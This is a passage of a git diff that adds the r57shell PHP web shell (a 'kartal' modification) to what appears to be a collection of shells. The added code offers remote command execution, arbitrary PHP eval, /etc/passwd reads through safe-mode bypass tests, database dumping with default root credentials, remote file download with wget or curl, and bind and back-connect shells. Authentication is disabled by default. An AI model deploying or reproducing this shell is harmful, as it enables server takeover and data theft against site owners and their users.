{$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! 
Can't connect to MySQL server"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(@mssql_select_db($_POST['mysql_db'],$db)) + { + $sql1 = "# MSSQL dump created by r57shell\r\n"; + $sql1 .= $sqh; + $sql2 = ''; + $res = @mssql_query("SELECT * FROM ".$_POST['mysql_tbl']."", $db); + if (@mssql_num_rows($res) > 0) { + while (($row = @mssql_fetch_assoc($res))) { + $keys = @implode(", ", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $sql1 = "# PostgreSQL dump created by r57shell\r\n"; + $sql1 .= $sqh; + $sql2 = ''; + + $res = @pg_query($db,"SELECT * FROM ".$_POST['mysql_tbl'].""); + if (@pg_num_rows($res) > 0) { + while (($row = @pg_fetch_assoc($res))) { + $keys = @implode(", ", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." 
(".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + @pg_close($db); + } + else echo "[-] ERROR! Can't connect to PostgreSQL server"; + break; + } + } + else if(!empty($_POST['dif'])&&!$fp) { echo "[-] ERROR! Can't write in dump file"; } + } +echo "</textarea></div>"; +echo "</b>"; +echo "</td></tr></table>"; +echo "<table width=100% cellpadding=0 cellspacing=0>"; +if(!$safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text2'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,'')); +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.$table_end1.$fe; +} +else{ +echo $fs.$table_up1.$lang[$language.'_text28'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6'])); +echo $te.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text42'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11'])); +echo $te.$table_end1.$fe; +if($safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text57'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option 
value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])); +echo $te.$table_end1.$fe; +} +if($safe_mode && $unix){ +echo $fs.$table_up1.$lang[$language.'_text67'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.$table_end1.$fe; +} +if(!$safe_mode){ +foreach ($aliases as $alias_name=>$alias_cmd) + { + $aliases2 .= "<option>$alias_name</option>"; + } +echo $fs.$table_up1.$lang[$language.'_text7'].$table_up2.$ts; +echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text54'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." 
* ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); +echo $te.$table_end1.$fe; +echo $fs.$table_up1.$lang[$language.'_text76'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); +echo $te.$table_end1.$fe; +echo $fs.$table_up1.$lang[$language.'_text32'].$table_up2.$font; +echo "<div align=center><textarea name=php_eval cols=100 rows=3>"; +echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");")); +echo "</textarea>"; +echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); +echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); +echo "</font>"; +echo $table_end1.$fe; +if($safe_mode&&$curl_on) +{ +echo $fs.$table_up1.$lang[$language.'_text33'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.$table_end1.$fe; +} +if($safe_mode) +{ +echo $fs.$table_up1.$lang[$language.'_text34'].$table_up2.$ts; +echo "<table class=table1 width=100% align=center>"; +echo 
sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.$table_end1.$fe; +} +if($safe_mode&&$mysql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text35'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306")))); +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.$table_end1.$fe; +} +if($safe_mode&&$mssql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text85'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")))); +echo 
sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.$table_end1.$fe; +} +if(@ini_get('file_uploads')){ +echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; +echo $table_up1.$lang[$language.'_text5'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,'')); +echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.$table_end1.$fe; +} +if(!$safe_mode&&!$windows){ +echo $fs.$table_up1.$lang[$language.'_text15'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://')); +echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.$table_end1.$fe; +} +if($mysql_on||$mssql_on||$pg_on||$ora_on) +{ +echo $table_up1.$lang[$language.'_text82'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text77']."</div></b></font>"; +echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>"); +echo 
sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"<b>".$lang[$language.'_text78'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1')); +echo sr(45,"<b>".$lang[$language.'_text79'].$arrow."</b>",in('checkbox','sc id=sc',0,'1')); +echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text40']."</div></b></font>"; +echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>"); +echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(45,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user")))); +echo sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1')); +echo 
sr(45,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','dif_name',15,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql")))); +echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt9'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text83']."</div></b></font>"; +echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option><option>Oracle</option></select>"); +echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(45,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),""); +echo $te."<div align=center><textarea cols=35 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></table>"; +} +if(!$safe_mode&&!$windows){ +echo $table_up1.$lang[$language.'_text81'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text9']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57')); +echo 
sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text12']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")))); +echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text22']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'jade.va.us.dal.net')); +echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667')); +echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); +echo $te."</td>".$fe."</tr></table>"; +} +echo $table_up3."<div align=center><font face=Verdana size=-2><b>[ r57shell - Modification By iFX | version ".$version." ]</b></font></div></td></tr></table>".$f; +?> \ No newline at end of file 
diff --git a/php/PHPshell/م€گr57_kartaم€‘/r57_kartal.jpg b/php/PHPshell/م€گr57_kartaم€‘/r57_kartal.jpg
new file mode 100644
index 0000000..0a94640
Binary files /dev/null and b/php/PHPshell/م€گr57_kartaم€‘/r57_kartal.jpg differ
diff --git a/php/PHPshell/م€گr57_kartaم€‘/r57_kartal.php b/php/PHPshell/م€گr57_kartaم€‘/r57_kartal.php
new file mode 100644
index 0000000..3b749b7
--- /dev/null
+++ b/php/PHPshell/م€گr57_kartaم€‘/r57_kartal.php
@@ -0,0 +1,1883 @@ +<?php +/******************************************************************************************************/ +/* +/* +/* ssssssss pppp pppp yyyyyy yyyyyy gggg gggg rrrr rrrr uuuu uuuu pppp pppp +/* ss pppp pp yy yy gg gggg rrrr uu uu pppp pp +/* ssssss pp pp yy yy gg gg rr uu uu pp pp +/* ss pp pp yy yy gg gg rr uu uuuu pp pp +/* ssssssss pppppppp yy gggggggg rrrrrrrr uuuu uuuu pppppppp +/* pp yy gg pp +/* pppppp yyyyyy gggggg pppppp +/* +/* kartal_567@hotmail.com[KaRTaL] +/* +/* r57shell.php - &#1089;&#1082;&#1088;&#1080;&#1087;&#1090; &#1085;&#1072; &#1087;&#1093;&#1087; &#1087;&#1086;&#1079;&#1074;&#1086;&#1083;&#1103;&#1102;&#1097;&#1080;&#1081; &#1074;&#1072;&#1084; &#1074;&#1099;&#1087;&#1086;&#1083;&#1085;&#1103;&#1090;&#1100; &#1096;&#1077;&#1083;&#1083; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099; &#1085;&#1072; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1077; &#1095;&#1077;&#1088;&#1077;&#1079; &#1073;&#1088;&#1072;&#1091;&#1079;&#1077;&#1088; +/* &#1042;&#1077;&#1088;&#1089;&#1080;&#1103;: 1.23 +/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ +/******************************************************************************************************/ + +/* ~~~ &#1053;&#1072;&#1089;&#1090;&#1088;&#1086;&#1081;&#1082;&#1080; ~~~ */ +error_reporting(0); +set_magic_quotes_runtime(0); +@set_time_limit(0); +@ini_set('max_execution_time',0); +@ini_set('output_buffering',0); +$safe_mode = @ini_get('safe_mode'); +$version = "q1w2e3r4"; +if(version_compare(phpversion(), '4.1.0') == -1) + { + $_POST = &$HTTP_POST_VARS; + $_GET = &$HTTP_GET_VARS; + $_SERVER = &$HTTP_SERVER_VARS; + } +if (@get_magic_quotes_gpc()) + { + foreach ($_POST as $k=>$v) + { + $_POST[$k] = stripslashes($v); + } + foreach ($_SERVER as $k=>$v) + { + $_SERVER[$k] = stripslashes($v); + } + } + +/* ~~~ &#1040;&#1091;&#1090;&#1077;&#1085;&#1090;&#1080;&#1092;&#1080;&#1082;&#1072;&#1094;&#1080;&#1103; ~~~ */ + +// 
$auth = 1; - &#1040;&#1091;&#1090;&#1077;&#1085;&#1090;&#1080;&#1092;&#1080;&#1082;&#1072;&#1094;&#1080;&#1103; &#1074;&#1082;&#1083;&#1102;&#1095;&#1077;&#1085;&#1072; +// $auth = 0; - &#1040;&#1091;&#1090;&#1077;&#1085;&#1090;&#1080;&#1092;&#1080;&#1082;&#1072;&#1094;&#1080;&#1103; &#1074;&#1099;&#1082;&#1083;&#1102;&#1095;&#1077;&#1085;&#1072; +$auth = 0; + +// &#1051;&#1086;&#1075;&#1080;&#1085; &#1080; &#1087;&#1072;&#1088;&#1086;&#1083;&#1100; &#1076;&#1083;&#1103; &#1076;&#1086;&#1089;&#1090;&#1091;&#1087;&#1072; &#1082; &#1089;&#1082;&#1088;&#1080;&#1087;&#1090;&#1091; +// &#1053;&#1045; &#1047;&#1040;&#1041;&#1059;&#1044;&#1068;&#1058;&#1045; &#1057;&#1052;&#1045;&#1053;&#1048;&#1058;&#1068; &#1055;&#1045;&#1056;&#1045;&#1044; &#1056;&#1040;&#1047;&#1052;&#1045;&#1065;&#1045;&#1053;&#1048;&#1045;&#1052; &#1053;&#1040; &#1057;&#1045;&#1056;&#1042;&#1045;&#1056;&#1045;!!! +$name='teufel'; // &#1083;&#1086;&#1075;&#1080;&#1085; &#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1103; +$pass='spyms'; // &#1087;&#1072;&#1088;&#1086;&#1083;&#1100; &#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1103; + +if($auth == 1) { +if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass) + { + header('WWW-Authenticate: Basic realm="shell"'); + header('HTTP/1.0 401 Unauthorized'); + exit("<b><a href=http://www.spygrup.org>www.spygrup.org</a> : Access Denied</b>"); + } +} +$head = '<!-- &#1047;&#1076;&#1088;&#1072;&#1074;&#1089;&#1090;&#1074;&#1091;&#1081; &#1042;&#1072;&#1089;&#1103; --> +<html> +<head> +<title>shell</title> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> + +<STYLE> +tr { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +td { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; 
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+.table1 {
+BORDER-RIGHT: #cccccc 0px;
+BORDER-TOP: #cccccc 0px;
+BORDER-LEFT: #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+BACKGROUND-COLOR: #D4D0C8;
+}
+.td1 {
+BORDER-RIGHT: #cccccc 0px;
+BORDER-TOP: #cccccc 0px;
+BORDER-LEFT: #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+font: 7pt Verdana;
+}
+.tr1 {
+BORDER-RIGHT: #cccccc 0px;
+BORDER-TOP: #cccccc 0px;
+BORDER-LEFT: #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+}
+table {
+BORDER-RIGHT: #eeeeee 1px outset;
+BORDER-TOP: #eeeeee 1px outset;
+BORDER-LEFT: #eeeeee 1px outset;
+BORDER-BOTTOM: #eeeeee 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+}
+input {
+BORDER-RIGHT: #ffffff 1px solid;
+BORDER-TOP: #999999 1px solid;
+BORDER-LEFT: #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+select {
+BORDER-RIGHT: #ffffff 1px solid;
+BORDER-TOP: #999999 1px solid;
+BORDER-LEFT: #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+submit {
+BORDER-RIGHT: buttonhighlight 2px outset;
+BORDER-TOP: buttonhighlight 2px outset;
+BORDER-LEFT: buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT: #ffffff 1px solid;
+BORDER-TOP: #999999 1px solid;
+BORDER-LEFT: #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>';
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
+if ($_POST['cmd']=="db_query")
+ {
+ echo $head;
+ switch($_POST['db'])
+ {
+ case 'MySQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+ $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+ {
+ if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); }
+ $querys = @explode(';',$_POST['db_query']);
+ foreach($querys as $num=>$query)
+ {
+ if(strlen($query)>5){
+ echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+ $res = @mysql_query($query,$db);
+ $error = @mysql_error($db);
+ if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
+ else {
+ if (@mysql_num_rows($res) > 0)
+ {
+ $sql2 = $sql = $keys = $values = '';
+ while (($row = @mysql_fetch_assoc($res)))
+ {
+ $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+ $values = @array_values($row);
+ foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+ $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+ $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+ }
+ echo "<table width=100%>";
+ $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+ $sql .= $sql2;
+ echo $sql;
+ echo "</table><br>";
+ }
+ else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
+ }
+ @mysql_free_result($res);
+ }
+ }
+ @mysql_close($db);
+ }
+ else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MySQL server</b></font></div>";
+ break;
+ case 'MSSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+ $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+ {
+ if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }
+ $querys = @explode(';',$_POST['db_query']);
+ foreach($querys as $num=>$query)
+ {
+ if(strlen($query)>5){
+ echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+ $res = @mssql_query($query,$db);
+ if (@mssql_num_rows($res) > 0)
+ {
+ $sql2 = $sql = $keys = $values = '';
+ while (($row = @mssql_fetch_assoc($res)))
+ {
+ $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+ $values = @array_values($row);
+ foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+ $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+ $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+ }
+ echo "<table width=100%>";
+ $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
